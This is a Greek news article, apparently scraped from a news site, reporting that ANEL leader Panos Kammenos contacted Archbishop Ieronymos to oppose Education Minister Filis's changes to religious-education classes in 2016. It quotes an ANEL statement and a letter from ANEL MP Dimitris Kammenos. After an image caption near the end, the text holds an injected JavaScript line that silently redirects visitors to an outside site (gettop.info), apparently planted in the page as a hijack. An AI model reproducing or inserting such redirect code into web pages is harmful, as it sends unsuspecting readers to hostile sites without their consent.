Κατά Φίλη ο Πάνος Καμμένος – Επικοινωνία με Ιερώνυμο

0
9

 

Ενδοκυβερνητικούς τριγμούς φέρεται πως προκαλούν οι αλλαγές στο μάθημα των Θρησκευτικών που αποφάσισε ο υπουργός Παιδείας.

Οι ΑΝΕΛ λαμβάνουν θέση διαμέσου του προέδρου τους Πάνου Καμμένου, ο οποίος, σύμφωνα με ανακοίνωση, είχε τηλεφωνική επικοινωνία με τον Αρχιεπίσκοπο Ιερώνυμο και θα έχουν συνάντηση στις 28 Σεπτεμβρίου. Μάλιστα, στην ανακοίνωση τονίζεται πως οι ΑΝΕΛ «με δημόσια τοποθέτησή τους έχουν ταχθεί υπέρ των απόψεων της Εκκλησίας για το μάθημα των Θρησκευτικών».

Συγκεκριμένα η ανακοίνωση αναφέρει:

«Ο Πρόεδρος των ΑΝΕΛ και Υπουργός Εθνικής Άμυνας κ. Πάνος Καμμένος επικοινώνησε με τον Αρχιεπίσκοπο Αθηνών και Πάσης Ελλάδος κ.κ. Ιερώνυμο. Αντάλλαξαν απόψεις για το θέμα των θρησκευτικών και θα έχουν συνάντηση την Τετάρτη 28 Σεπτεμβρίου 2016, στις 12:30, προ της τοποθέτησης του Προέδρου των ΑΝΕΛ στη Βουλή, στην προ ημερησίας διατάξεως συζήτηση για θέματα Παιδείας σε επίπεδο πολιτικών αρχηγών. Οι ΑΝΕΛ με δημόσια τοποθέτησή τους έχουν ταχθεί υπέρ των απόψεων της Εκκλησίας για το μάθημα των θρησκευτικών».

Επιπλέον, ο βουλευτής των ΑΝΕΛ Δημήτρης Καμμένος σε επιστολή του αναφέρει πως είναι «απαράδεκτες» οι δηλώσεις του κ. Φίλη και διερωτάται γιατί ο υπουργός Παιδείας φέρνει τώρα αυτό το σχέδιο νόμου «σε μια συγκυρία που η Ελλάδα διαπραγματεύεται σκληρά για να κλείσει η δεύτερη αξιολόγηση και ο ελληνικός λαός ταλαιπωρείται από τα οικονομικά βάρη».

epistoli-dimitris-kamenos-anel setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here